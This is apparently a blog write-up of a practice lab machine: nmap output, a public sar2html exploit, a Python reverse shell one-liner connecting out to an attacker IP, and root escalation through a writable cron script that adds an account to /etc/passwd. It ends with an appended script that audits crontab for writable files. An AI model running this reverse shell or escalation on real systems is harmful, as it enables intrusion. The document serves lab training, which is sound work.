iT邦幫忙

2023 iThome 鐵人賽 (iThome Ironman Contest)

DAY 4
Things you could miss

  • Common files in web directories.
  • Web page functionality and versions.
  • After getting onto the machine, check the machine's scheduled tasks.

Summary

  • Common files in web directories (robots.txt).
  • Web page functionality and version (sar2html Ver 3.2.1); exploitdb has an exploit that can be used.
  • After getting onto the machine, check the scheduled tasks (/etc/crontab); there is a regularly scheduled bash script that can be modified.

Walkthrough

  • First use nmap to confirm which ports are open and what services are running (old log)
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-27 14:32 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 14:32
Scanning 192.168.223.35 [2 ports]
Completed Ping Scan at 14:32, 0.27s elapsed (1 total hosts)
Initiating Connect Scan at 14:32
Scanning 192.168.223.35 [1000 ports]
Discovered open port 80/tcp on 192.168.223.35
Discovered open port 22/tcp on 192.168.223.35
Increasing send delay for 192.168.223.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Completed Connect Scan at 14:33, 18.64s elapsed (1000 total ports)
Initiating Service scan at 14:33
Scanning 2 services on 192.168.223.35
Completed Service scan at 14:33, 6.56s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.223.35.
Initiating NSE at 14:33
Completed NSE at 14:33, 1.16s elapsed
Initiating NSE at 14:33
Completed NSE at 14:33, 1.10s elapsed
Nmap scan report for 192.168.223.35
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds
  • dirb scan of the site directories
    https://ithelp.ithome.com.tw/upload/images/20230918/200782984IEjON6Wa4.png

  • Manually check the website
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298WDeMaYkytr.png

  • Manually check the website (phpinfo.php is worth a look; it has some useful information)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298osN6DIyvTI.png

  • Manually check the website (robots.txt is worth a look; sometimes it has usable information)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298lSWoS7ARLI.png

  • Manually check the website (follow the directory hinted at in robots.txt, sar2HTML; it is a functional page)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298CXDKP1k3EW.png

  • exploitdb (search sar2html; there is an exploit to try)
    https://ithelp.ithome.com.tw/upload/images/20230918/200782988i7ewPcrzF.png

  • exploitdb (49344 works; got a shell)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298gv63yq3aKy.png

  • reverse shell
    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.227",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298LCOoIsj2k1.png

  • Use python to get a pty shell
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • get local.txt
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298OBvY57wFnh.png

  • Check /etc/crontab, find something interesting, follow it all the way down and find a writable bash script
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298Ai1Hr5Tyn3.png

  • Use openssl to generate the password entry to write into /etc/passwd
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298G6J4etp3RT.png

  • Build the bash script (there are many ways to do this; go with whatever you prefer); it writes to /etc/passwd and adds an account with root privileges (demo)
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298fMBJuwvxDI.png

  • Check /etc/passwd and confirm the account was added
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298kSWxobUBty.png

  • Log in to the high-privilege demo account
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298CRzpA4RUcY.png

  • get proof.txt
    https://ithelp.ithome.com.tw/upload/images/20230918/20078298Dv8yfRlJXK.png
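As an added example (not code from the original post), here is a small audit for the /etc/crontab check in the steps above: it parses system-crontab job lines (time fields, user, command), pulls the absolute paths out of each command and flags cron-run files that are group- or world-writable, or root jobs owned by a non-root user, which is the condition that let the script on this box be modified. The crontab text and the (st_mode, st_uid) table are constructed sample data; on a live host pass a wrapper around os.stat as stat_fn.

```python
import re
import stat
# Constructed /etc/crontab sample for this example (not the box's real file).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /usr/local/bin/backup.sh
*/5 *   * * *   www-data /var/www/cleanup.sh
@reboot         root    /opt/startup.sh
"""
# Constructed (st_mode, st_uid) pairs standing in for os.stat on a live host.
SAMPLE_STATS = {
    "/usr/local/bin/backup.sh": (0o100777, 1000),  # world-writable, non-root owner
    "/var/www/cleanup.sh": (0o100755, 33),         # only its owner can write: fine
    "/opt/startup.sh": (0o100664, 0),              # group-writable root job
}
# System crontab job line: five time fields (or an @reboot-style shortcut), user, command.
CRON_LINE = re.compile(r"^(?:@\w+|(?:\S+\s+){5})\s*(\S+)\s+(.*)$")

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip comments, blanks and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2)

def command_paths(command):
    """Absolute paths referenced by a command (rough: tokens starting with '/')."""
    return [tok for tok in re.split(r"[\s;&|]+", command) if tok.startswith("/")]

def audit_crontab(text, stat_fn=SAMPLE_STATS.get):
    """Return (user, path, reason) findings; stat_fn(path) -> (st_mode, st_uid) or None."""
    findings = []
    for user, command in parse_system_crontab(text):
        for path in command_paths(command):
            info = stat_fn(path)
            if info is None:  # path missing (or not in the sample table): nothing to check
                continue
            mode, uid = info
            if mode & stat.S_IWOTH:
                findings.append((user, path, "world-writable"))
            elif mode & stat.S_IWGRP:
                findings.append((user, path, "group-writable"))
            elif user == "root" and uid != 0:
                findings.append((user, path, f"root job but file owned by uid {uid}"))
    return findings
```

Running audit_crontab(SAMPLE_CRONTAB) reports backup.sh as world-writable and startup.sh as group-writable; the fix on a real host is to make such scripts root-owned and mode 0755 (or tighter).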

Series: PG Play 怎麼玩都不累 - 靶機 writeup 思路分享 (PG Play never gets old: sharing walkthrough approaches for target machines)